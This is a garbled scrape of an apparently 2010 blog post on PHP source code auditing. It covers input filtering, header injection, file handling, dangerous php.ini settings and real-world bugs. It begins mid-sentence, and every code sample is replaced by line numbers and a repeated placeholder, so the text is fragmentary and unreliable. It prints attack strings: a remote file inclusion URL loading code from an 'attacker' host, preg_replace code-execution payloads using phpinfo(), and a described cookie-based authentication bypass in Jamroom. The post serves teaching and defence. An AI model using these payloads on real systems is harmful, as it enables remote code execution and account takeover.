From:http://www.abysssec.com/blog/2010/03/attention-in- or > or >. HTML encoding should be used for output handling, where user input should be reflected in HTML without injecting code. (See also: htmlentities())? URL encoding makes sure, that every characternot allowed within URLs, according to RFC 1738, is properly encoded. E.g. space converts to + or %20 and IV ? Configuration : Programming errors, including logic program. well , we know there are 4 points that can help us in the process : 1 ? Our chr(127) into numeric HTML entities.? FILTER_SANITIZE_EMAILRemoves all characters not commonly used in an email address.? FILTER_SANITIZE_URLRemoves all characters not allowed in URLs.? FILTER_SANITIZE_NUMBER_INTRemoves all characters except digits and + -.? FILTER_SANITIZE_NUMBER_FLOATRemoves all characters not allowed in floating point numbers.? FILTER_SANITIZE_MAGIC_QUOTESApplies addslashes(). Other Filters? FILTER_UNSAFE_RAWIs a dummy filter.? FILTER_CALLBACKCalls a userspace callback function defining the filter.D) HTTP Header OutputHTTP headers can be set using the header() function. User input should always be checked before being passed to header(), otherwise a number of security issues become relevant. Newline characters should never be used with header() in order to prevent HTTP header injections. Injected headers can be used for XSS and HTTP response splitting attacks, too. In general, user input should be handled in a context-sensitive manner.Dynamic content within parameters to Locationor Set-Cookie headers should be escaped by urlencode(). For other HTTP header parameters, unintended context changes must be prevented as well; e.g. a semicolon separates several parameters within Content-Type. 1234登录后复制登录后复制 登录后复制 Applications should not allow arbitrary HTTP Location redirects, since these can be used for phishing attacks. In addition, open redirects can have a negative impact on the cross domain policy infrastructure of Adobe‘s Flash Player.E)Secure File Handling:? Detect and replace NULL bytes: 12345登录后复制登录后复制登录后复制 登录后复制 ? Prevent remote file inclusion (path prefix) and directory traversal (basename): 123登录后复制登录后复制登录后复制登录后复制登录后复制登录后复制登录后复制登录后复制登录后复制登录后复制 登录后复制 ? Include only whitelisted files: 12345登录后复制登录后复制登录后复制 登录后复制 3) Configuration point :last point . weakness in Programing (Source code) Structure . one of the most celever part in source Code Auditing .we sea these Fllowing Configuration in code or PHP.ini Setting :[a]- when Server don’t Disabling Remote URLs for File Handling Functions File handling functions like fopen, file_get_contents, and include accept URLs as file parameters (for example: fopen(‘http://www.example.com/’, ‘r’)). Even though this enables developers to access remote resources like HTTP URLs, it poses as a huge security risk if the filename is taken from user input without proper sanitization, and opens the door for remote code execution on the server.[b] Register Globals is ‘ON’ :Prior to version 4.2.0, PHP used to provide input values as global variables. This feature was named register_globals, and it was responsible for many security issues in web applications because it allowed attackers to freely manipulate global variables in many situations. Fortunately it’s disabled by default from PHP 4.2.0 and on, because it’s dangerous on so many scales. 123456登录后复制 登录后复制 demonstration :http://path/inc/step_two_tables.php?server_inc=http://attacker/js_functions.php [c] Server Don’t Limit Access to Certain File Name Patterns :Many file extensions should not be accessible by end users. Take for example .inc. Some developers prefer to assign this extension to included scripts. The problem here is that this extension isn’t parsed by the PHP engine, and as a result, anyone can view the source code by requesting the file itself: http://www.example.com/includes/settings.inc Such files may contain sensitive data like MySQL passwords. So you need to ensure that end users can not access those files. Other candidate extensions are .sql, .mysql, and .pgsql. Another pattern to look out for is backup files. Some editors create backup versions of edited files in the same directory where the original file is located. For example, if you edit index.php, a backup called index.php~ will be created. Given that this file doesn’t end with .php, it will not be processed by the PHP engine, and its code will also be available to users by requesting http://www.example.com/index.php~[d] Error Messages and Logging is ON :By default, PHP prints error messages to the browser’s output. While this is desirable during the development process, it may reveal security information to users, like installation paths or usernames..And many other attacks, usually design by the programmer ! Real Word Example : Exp 1 : PHP Code Execution:There is an arbitrary php code execution issuedue to the unsafe use of preg_replace evaluation when parsing anchor tags and the like. 1234567登录后复制 登录后复制 php code execution is possible via complex variable evaluation.[:nom:{${phpinfo()}}] or this code : 1234567891011登录后复制 登录后复制 abuse :[email]{${phpinfo()}}[/email] 2- Configuration mistake : Authentication BypassThere is a serious flaw in the Jamroom (JamRoom 12345678910111213141516登录后复制 登录后复制 The problem with the above code is that $_val is a user supplied value taken from $_COOKIE['JMU_Cookie']. Since the cookie data is serialized an attacker can specify data types such as boolean values, and bypass the password check, and authenticate with only a username. If the first byte of the password hash stored in the database is numerical then a boolean value of true can be used in place of an actual password, and if the first byte is a letter then a boolean value of false is required. 123456789101112登录后复制 登录后复制 The above script is an example of how it works, and will create a cookie to login as the user admin. For more information check out the comparison operators section of the php manual. Specifically the “identical” operator. 3- new bug :http://www.sektioneins.com/en/advisories/advisory-022009-phpids-unserialize-vulnerability/index.htmlin other post , i will publish some of our most recent research on browsers security and results we got on this topic as i promised in a few past posts . regardsdaphne